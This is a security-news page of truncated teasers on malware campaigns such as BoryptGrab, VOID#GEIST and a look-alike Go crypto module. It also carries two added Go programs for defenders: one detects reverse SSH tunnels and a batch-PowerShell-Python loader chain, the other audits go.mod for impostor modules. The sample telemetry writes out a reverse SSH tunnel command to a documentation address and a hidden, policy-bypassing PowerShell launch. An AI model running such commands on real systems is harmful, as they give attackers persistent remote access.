
BoryptGrab Stealer Spreads Through 100+ Fake GitHub Repositories in Massive Malware Campaign

Trend Micro researchers have uncovered a large-scale malware distribution campaign using over 100 GitHub repositories to spread BoryptGrab, an information stealer that targets browser credentials, cryptocurrency wallets, and sensitive files while deploying reverse SSH backdoors for persistent access. The campaign leverages the trust users place in GitHub to distribute malware disguised as legitimate software tools,…


BoryptGrab Stealer Spreads Through 100+ Malicious GitHub Repositories

A massive malware distribution campaign has been discovered leveraging more than 100 GitHub repositories to spread the BoryptGrab information stealer. According to Trend Micro research, the campaign targets Windows users through deceptive downloads masquerading as legitimate software tools and gaming cheats.

The Attack Chain

The threat actors behind this campaign have deployed an extensive network…


APT36 Vibeware Campaign: Pakistan’s Transparent Tribe Weaponizes AI to Mass-Produce Malware Targeting India

Pakistan-aligned threat actor Transparent Tribe (APT36) has embraced AI-assisted malware development to flood Indian government networks with disposable, polyglot implants—a technique security researchers are calling “vibeware” or Distributed Denial of Detection (DDoD).

AI-Powered Malware Industrialization

According to Bitdefender’s research, APT36 has shifted from sophisticated, handcrafted implants to high-volume, AI-generated malware written in obscure programming languages…


VOID#GEIST: Multi-Stage Malware Campaign Uses Python Loaders and APC Injection to Deploy XWorm, AsyncRAT, and Xeno RAT

Security researchers at Securonix have uncovered a sophisticated multi-stage malware campaign dubbed VOID#GEIST that delivers three separate remote access trojans (RATs) through an elaborate infection chain designed to evade detection.

A Modular Attack Framework

Unlike traditional malware that relies on standalone executables, VOID#GEIST employs a modular pipeline comprising batch scripts for orchestration, PowerShell for stealthy…

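Two of the behaviours described on this page translate directly into process-telemetry detections: the reverse SSH backdoor that BoryptGrab deploys for persistence, and the batch-to-PowerShell-to-Python orchestration chain attributed to VOID#GEIST. The following is an added example written for this page, not code from Trend Micro, Securonix or either malware family. It assumes process-creation events have already been normalised into a small struct (PID, parent PID, image path, command line, as Sysmon event 1 provides), and runs two rules over a constructed set of events: `ssh` launched with a `-R` remote-forward, and a `python.exe` whose ancestry contains `cmd.exe` followed by `powershell.exe`. The sample events, paths and the 203.0.113.5 address are constructed for the example.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// ProcEvent is a minimal process-creation record (Sysmon event 1 or EDR
// telemetry reduced to the fields this example needs). Assumption: the
// analyst has already normalised telemetry into this shape.
type ProcEvent struct {
	PID, PPID int
	Image     string // full path of the executable
	CmdLine   string
}

// Finding ties a rule name to the offending process.
type Finding struct {
	Rule string
	PID  int
}

// SampleEvents is constructed telemetry for this example, not data from the
// reported campaigns. 203.0.113.5 is a documentation address (TEST-NET-3).
var SampleEvents = []ProcEvent{
	{1, 0, `C:\Windows\explorer.exe`, "explorer.exe"},
	{100, 1, `C:\Windows\System32\cmd.exe`, `cmd.exe /c run.bat`},
	{101, 100, `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `powershell.exe -w hidden -ep bypass -f stage.ps1`},
	{102, 101, `C:\Users\u\AppData\Local\Programs\Python\python.exe`, `python.exe loader.py`},
	{200, 1, `C:\Windows\System32\OpenSSH\ssh.exe`, `ssh.exe -N -R 2222:localhost:22 user@203.0.113.5`},
	{300, 1, `C:\Windows\System32\OpenSSH\ssh.exe`, `ssh.exe user@203.0.113.5`}, // benign: no -R
	{400, 1, `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `powershell.exe Get-Process`},
}

// baseName lowercases the executable file name so rules can match on it.
func baseName(image string) string {
	// Windows paths use backslashes; normalise before taking the base.
	return strings.ToLower(path.Base(strings.ReplaceAll(image, `\`, "/")))
}

// ancestry returns executable base names from the root ancestor down to pid.
// The seen map guards against PID reuse producing a cycle in the telemetry.
func ancestry(byPID map[int]ProcEvent, pid int) []string {
	var chain []string
	seen := map[int]bool{}
	for p, ok := byPID[pid]; ok && !seen[p.PID]; p, ok = byPID[p.PPID] {
		seen[p.PID] = true
		chain = append([]string{baseName(p.Image)}, chain...)
	}
	return chain
}

// isSubsequence reports whether want appears in order (not necessarily
// adjacently) within have, so intermediate wrapper processes do not hide
// the chain.
func isSubsequence(have, want []string) bool {
	i := 0
	for _, h := range have {
		if i < len(want) && h == want[i] {
			i++
		}
	}
	return i == len(want)
}

// Detect applies two rules to a set of process events:
//  1. reverse_ssh_tunnel: ssh started with -R (remote port forward), the
//     building block of a reverse SSH backdoor.
//  2. bat_ps_py_loader_chain: a python process whose ancestry contains
//     cmd.exe followed by powershell.exe, the orchestration shape the
//     VOID#GEIST write-up describes.
func Detect(events []ProcEvent) []Finding {
	byPID := make(map[int]ProcEvent, len(events))
	for _, e := range events {
		byPID[e.PID] = e
	}
	var out []Finding
	for _, e := range events {
		switch name := baseName(e.Image); name {
		case "ssh.exe", "ssh":
			for _, tok := range strings.Fields(e.CmdLine) {
				if strings.HasPrefix(tok, "-R") { // ssh accepts both "-R spec" and "-Rspec"
					out = append(out, Finding{"reverse_ssh_tunnel", e.PID})
					break
				}
			}
		case "python.exe", "python":
			if isSubsequence(ancestry(byPID, e.PID), []string{"cmd.exe", "powershell.exe", name}) {
				out = append(out, Finding{"bat_ps_py_loader_chain", e.PID})
			}
		}
	}
	return out
}

func main() {
	for _, f := range Detect(SampleEvents) {
		fmt.Printf("%-24s pid=%d\n", f.Rule, f.PID)
	}
}
```

The ancestry check matches an ordered subsequence rather than exact parent/grandparent, so an extra `conhost.exe` or `cmd.exe /c` wrapper between stages does not break the rule; the trade-off is that a developer who opens a shell, then PowerShell, then Python by hand will also trigger it, so in production the finding should be enriched with the `-ep bypass` / `-w hidden` arguments before alerting.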

Malicious Go Crypto Module Steals Passwords and Deploys Rekoobe Backdoor

A sophisticated supply chain attack has been uncovered targeting Go developers through a malicious module that impersonates the legitimate golang.org/x/crypto library. The attack demonstrates how threat actors are increasingly exploiting namespace confusion to compromise developer environments and deploy persistent backdoors.

The Attack Mechanism

Security researchers at Socket discovered the malicious module github[.]com/xinfeisoft/crypto, which masquerades as…

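Namespace confusion of this kind is visible in `go.mod` before anything is built: the impostor has the same final path element as a `golang.org/x` package but lives under a different host. The following is an added example written for this page, not Socket's tooling or anything from the module in question. It scans `go.mod` text for two patterns: a `require` of a module outside `golang.org/x/` whose last path element matches a watch-list of `x/` package names, and a `replace` that redirects a genuine `golang.org/x` module to another host. The watch-list, the sample `go.mod`, its version strings and the `example.invalid` host are constructed; the reported path `github.com/xinfeisoft/crypto` appears only as a string literal and is never fetched. The comment stripping is deliberately naive (anything after `//`), which is adequate for `go.mod` syntax.

```go
package main

import (
	"fmt"
	"strings"
)

// knownXPackages lists golang.org/x subprojects whose names are worth watching
// for look-alikes. Assumption for this example: hand-maintained, not complete.
var knownXPackages = map[string]bool{
	"crypto": true, "net": true, "sys": true, "text": true, "tools": true,
	"oauth2": true, "sync": true, "time": true, "term": true, "mod": true,
}

// Finding describes one suspicious directive in a go.mod file.
type Finding struct {
	Directive string // "require" or "replace"
	Path      string // the suspicious module path
	Reason    string
}

// SampleGoMod is a constructed go.mod for this example. The versions and the
// example.invalid host are placeholders, not observed values.
const SampleGoMod = `module example.com/app

go 1.22

require (
	golang.org/x/crypto v0.31.0
	github.com/xinfeisoft/crypto v1.0.0 // impostor: same last element as golang.org/x/crypto
	github.com/stretchr/testify v1.9.0
)

replace golang.org/x/net => example.invalid/mirror/net v0.0.1
`

// lastElem returns the final path element of a module path, e.g.
// "github.com/xinfeisoft/crypto" -> "crypto".
func lastElem(modPath string) string {
	if i := strings.LastIndex(modPath, "/"); i >= 0 {
		return modPath[i+1:]
	}
	return modPath
}

// check inspects one directive's fields (everything after the directive
// keyword) and returns a finding if it matches a namespace-confusion pattern.
func check(directive string, fields []string) []Finding {
	if len(fields) == 0 {
		return nil
	}
	modPath := fields[0]
	switch directive {
	case "require":
		if !strings.HasPrefix(modPath, "golang.org/x/") && knownXPackages[lastElem(modPath)] {
			return []Finding{{directive, modPath, "last path element matches a golang.org/x package"}}
		}
	case "replace":
		// Shape: old [version] => new [version]. Local targets ("./", "../",
		// "/") are normal during development and are not flagged.
		if !strings.HasPrefix(modPath, "golang.org/x/") {
			return nil
		}
		for i, f := range fields {
			if f != "=>" || i+1 >= len(fields) {
				continue
			}
			target := fields[i+1]
			if strings.HasPrefix(target, ".") || strings.HasPrefix(target, "/") {
				return nil
			}
			if !strings.HasPrefix(target, "golang.org/x/") {
				return []Finding{{directive, target, "replace redirects " + modPath + " to another host"}}
			}
		}
	}
	return nil
}

// AuditGoMod walks go.mod text line by line, tracking whether it is inside a
// parenthesised require/replace block, and collects findings in file order.
func AuditGoMod(gomod string) []Finding {
	var findings []Finding
	block := "" // "require" or "replace" while inside "( ... )", else ""
	for _, raw := range strings.Split(gomod, "\n") {
		line := strings.TrimSpace(raw)
		if i := strings.Index(line, "//"); i >= 0 {
			line = strings.TrimSpace(line[:i])
		}
		if line == "" {
			continue
		}
		fields := strings.Fields(line)
		switch {
		case fields[0] == "require" || fields[0] == "replace":
			if len(fields) >= 2 && fields[1] == "(" {
				block = fields[0]
				continue
			}
			block = ""
			findings = append(findings, check(fields[0], fields[1:])...)
		case line == ")":
			block = ""
		case block != "":
			findings = append(findings, check(block, fields)...)
		}
	}
	return findings
}

func main() {
	for _, f := range AuditGoMod(SampleGoMod) {
		fmt.Printf("%s %s: %s\n", f.Directive, f.Path, f.Reason)
	}
}
```

Run it in CI against every `go.mod` in the repository (including those of vendored modules) and treat a finding as a review stop, not an automatic block: the official GitHub mirrors under `github.com/golang/` will also match the `require` rule and belong on an allow-list once reviewed.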

Fake Google Security Check Transforms Browser Into Surveillance Toolkit via PWA Installation

A sophisticated phishing campaign has been discovered that transforms web browsers into comprehensive surveillance platforms by masquerading as a Google Account security page. According to Malwarebytes researchers, this attack represents one of the most fully-featured browser-based surveillance toolkits observed in the wild.

Attack Methodology

The attack begins with a convincing replica of a Google Account…


DarkCloud Infostealer Emerges as Major Enterprise Threat: $30 Malware Delivers Scalable Credential Theft

The cybersecurity threat landscape is facing a growing challenge as infostealers continue to dominate the initial access ecosystem in 2026. Among the latest threats drawing serious attention is DarkCloud, a commercially available credential-harvesting malware that proves even low-cost tools can deliver devastating results against enterprise environments.

The $30 Threat That Can Compromise Entire Networks

DarkCloud…


APT28 Targets European Entities with Operation MacroMaze Webhook Malware Campaign

Russia’s notorious state-sponsored threat actor APT28 (also known as Fancy Bear) has been attributed to a sophisticated new campaign targeting organizations across Western and Central Europe. According to S2 Grupo’s LAB52 threat intelligence team, the campaign—codenamed Operation MacroMaze—was active between September 2025 and January 2026. What makes this campaign notable is its reliance on basic…


Remcos RAT Evolves with Real-Time Webcam Streaming and Live Keylogging Capabilities

A newly observed variant of Remcos RAT has introduced significant upgrades to its surveillance arsenal, marking a dangerous evolution in how this remote access trojan operates on compromised Windows systems.

From Storage to Streaming

According to Infosecurity Magazine, the updated strain represents a fundamental shift in operational methodology. Rather than relying primarily on storing stolen…
